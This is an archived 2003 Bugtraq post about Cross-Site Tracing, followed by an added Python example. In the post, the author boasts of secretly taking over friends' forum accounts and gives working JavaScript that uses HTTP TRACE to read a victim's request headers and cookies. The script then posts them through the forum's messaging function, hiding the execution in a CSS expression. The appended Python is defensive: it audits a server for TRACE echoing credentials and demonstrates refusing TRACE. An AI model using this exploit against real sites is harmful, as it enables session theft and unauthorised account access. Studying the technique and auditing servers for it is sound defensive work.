[28614] in bugtraq


Re: TRACE used to increase the danger of XSS.

daemon@ATHENA.MIT.EDU (Phrack)
Fri Jan 24 13:20:49 2003

Message-ID: <000901c2c345$1c60f070$1d00a8c0@chenhaiyan>
From: "Phrack" <security@fooyu.com>
To: <jeremiah@whitehatsec.com>, <bugtraq@securityfocus.com>,
        <webappsec@securityfocus.com>, <vulnwatch@vulnwatch.org>
Date: Fri, 24 Jan 2003 09:08:28 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

It's really a terrible security hole. Using this method, I have hacked some BBS accounts of my friends. If you do it properly, it won't be noticed by the victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

  var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";

  var target = "http://bbs.for.bar";

  cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
  var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
  showModalDialog(target, null, readyCode);
}
</script>

<script>
xssDomainTraceRequest();
</script>

Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD.
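One way to audit a server you operate for this exposure and to see the hardened behaviour, as an added example that is not part of Chen's post: it sends a TRACE carrying a dummy canary cookie, parses the echoed request (the message/http body the post's script forwards with the POST) for credential-bearing headers, and starts a minimal handler that answers TRACE with 405 instead of echoing (on Apache the equivalent is `TraceEnable off`). The ECHOED sample and host names are constructed.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Headers that an echoed TRACE request hands to attacker-controlled script.
SENSITIVE = ("cookie", "authorization", "proxy-authorization")

def reflected_sensitive_headers(body):
    """Parse a TRACE response body (the echoed request) and return the
    credential-bearing header names it reflects, in order of appearance."""
    found = []
    for line in body.splitlines()[1:]:          # skip the request line
        if not line.strip():
            break                               # blank line ends the headers
        name, _, _ = line.partition(":")
        if name.strip().lower() in SENSITIVE:
            found.append(name.strip().lower())
    return found

def audit_trace(host, port):
    """Send one TRACE with a canary cookie (no real session) to a server you
    run; report whether TRACE is enabled and which sensitive headers echo."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("TRACE", "/", headers={"Cookie": "canary=not-a-real-session"})
    resp = conn.getresponse()
    body = resp.read().decode("iso-8859-1", "replace")
    conn.close()
    enabled = resp.status == 200
    return {"enabled": enabled,
            "reflects": reflected_sensitive_headers(body) if enabled else []}

class NoTraceHandler(BaseHTTPRequestHandler):
    """Hardened behaviour: refuse TRACE rather than echo the request."""
    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET, POST")
        self.send_header("Content-Length", "0")
        self.end_headers()
    def log_message(self, *args):               # keep the demo quiet
        pass

def run_hardened_server():
    """Start the handler on a free loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), NoTraceHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

# Constructed example of what a server with TRACE enabled echoes back.
ECHOED = ("TRACE / HTTP/1.1\r\nHost: bbs.example\r\n"
          "Cookie: session=abc123\r\nAuthorization: Basic dXNlcjpwdw==\r\n\r\n")
```

Run `audit_trace` against your own hosts; a result with `enabled` true and a non-empty `reflects` list is exactly the condition the post's script relies on.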
